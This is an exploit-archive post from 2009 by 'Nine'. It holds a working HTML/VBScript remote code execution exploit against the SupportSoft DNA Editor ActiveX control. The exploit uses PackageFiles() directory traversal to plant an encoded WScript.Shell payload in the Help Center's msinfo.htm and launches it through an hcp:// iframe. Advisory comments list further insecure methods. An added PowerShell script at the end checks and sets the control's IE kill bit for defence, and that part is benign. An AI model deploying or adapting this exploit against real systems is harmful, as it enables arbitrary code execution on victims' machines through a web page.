SupportSoft DNA Editor Module (dnaedit.dll) Code Execution Exploit
Source: http://retrogod.altervista.org/ Author: Nine Published: 2009-03-06
<!-- SupportSoft DNA Editor Module (dnaedit.dll v6.9.2205) remote code execution exploit (IE6/7)
     by Nine:Situations:Group::bruiser

     vendor url: http://www.supportsoft.com/
     our site: http://retrogod.altervista.org/

     details:
     CLSID: {01110800-3E00-11D2-8470-0060089874ED}
     Progid: Tioga.Editor.1
     Binary Path: C:\Programmi\File comuni\SupportSoft\bin\dnaedit.dll
     KillBitted: False
     Implements IObjectSafety: True
     Safe For Initialization (IObjectSafety): True
     Safe For Scripting (IObjectSafety): True

     vulnerabilities, discovered two months ago:
     insecure methods: Packagefiles() - remote file overwrite, directory traversal, *script injection* and ... a crash (investigating on this one)
                       SaveDna() - remote file creation, directory traversal
                       AddFile() - remote cpu consumption
                       SetIdentity() - remote file creation

     This dll was present inside the SupportSoft ActiveX Controls Security Update for a previous buffer overflow vulnerability,
     see: http://secunia.com/advisories/24246/
     My download url was: http://www.supportsoft.com/support/controls_update.asp
     actually unreachable
     see also: http://www.securityfocus.com/archive/1/archive/1/461147/100/0/threaded
     Well, they probably patched by marking them unsafe for initialization (I see that the ScriptRunner module suffers from a
     buffer overflow bug in the Evaluate() method...) but they gave you another vulnerable control...
-->
<HTML>
<OBJECT classid='clsid:01110800-3E00-11D2-8470-0060089874ED' width=1 height=1 id='DNAEditorCtl' />
</OBJECT>
<SCRIPT language='VBScript'>
<!--
sh="<HTML><SCRIPT LANGUAGE=VBScript>" + unescape("Execute%28unescape%28%22Set%20s%3DCreateObject%28%22%22WScript.Shell%22%22%29%250D%250As.Run%20%22%22cmd%20%252fc%20start%20calc%22%22%22%29%29") + "<" + Chr(47) + "SCRIPT><" + Chr(47) + "HTML>"
'the file path is injected into msinfo.htm; you can see the code with a hex editor. There is some limit on the *number* of chars and some problem with newlines, resolved with VBScript code evaluation by Execute(). A popup says "Unable to post..."; click Ok or close it and you are pwned
DNAEditorCtl.PackageFiles sh + "../../../../../../../../../WINDOWS/PCHEALTH/HELPCTR/System/sysinfo/msinfo.htm"
'launch the script and calc.exe through the Help and Support Center Service
document.write("<iframe src=""hcp://system/sysinfo/msinfo.htm"">")
-->
</SCRIPT>
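The advisory's "KillBitted: False" line is the detail that makes this control reachable from a web page, since IE will instantiate any non-kill-bitted control that reports itself safe for scripting. As an added defensive example (not part of the original advisory or exploit), the following PowerShell script checks whether the CLSID quoted above carries IE's kill bit and, with `-Remediate`, sets it using the documented "ActiveX Compatibility" registry key. It assumes an elevated session; the CLSID is the one from the advisory, and the 0x400 flag value is the documented kill bit.

```powershell
# Added example, not part of the original advisory: report whether Internet Explorer's
# kill bit is set for the SupportSoft DNA Editor CLSID named in the advisory, and set
# it when -Remediate is given. Uses the documented "ActiveX Compatibility" key and
# Compatibility Flags bit 0x400. Run in an elevated PowerShell session.
param([switch]$Remediate)

$Clsid   = '{01110800-3E00-11D2-8470-0060089874ED}'   # CLSID from the advisory text
$KillBit = 0x400                                       # documented kill-bit flag value

# The Wow6432Node view covers 32-bit IE on 64-bit Windows; skip it on 32-bit hosts.
$Paths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")
if ([Environment]::Is64BitOperatingSystem) {
    $Paths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

function Get-CompatFlags {
    param([string]$Path)
    if (-not (Test-Path $Path)) { return 0 }
    $item = Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]$item.'Compatibility Flags'
}

function Test-KillBit {
    param([string]$Path)
    return (((Get-CompatFlags $Path) -band $KillBit) -ne 0)
}

function Set-KillBit {
    param([string]$Path)
    # Preserve any compatibility flags already present; only OR in the kill bit.
    $flags = (Get-CompatFlags $Path) -bor $KillBit
    New-Item -Path $Path -Force | Out-Null
    New-ItemProperty -Path $Path -Name 'Compatibility Flags' -Value $flags `
        -PropertyType DWord -Force | Out-Null
}

foreach ($p in $Paths) {
    $set = Test-KillBit $p
    $state = if ($set) { 'SET' } else { 'NOT SET (control can be instantiated from IE)' }
    Write-Output ("{0}`n  kill bit: {1}" -f $p, $state)
    if (-not $set -and $Remediate) {
        Set-KillBit $p
        Write-Output ("  kill bit after remediation: {0}" -f (Test-KillBit $p))
    }
}
```

Without `-Remediate` the script only reports, so it can be run as a read-only audit across a fleet before any change is pushed.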
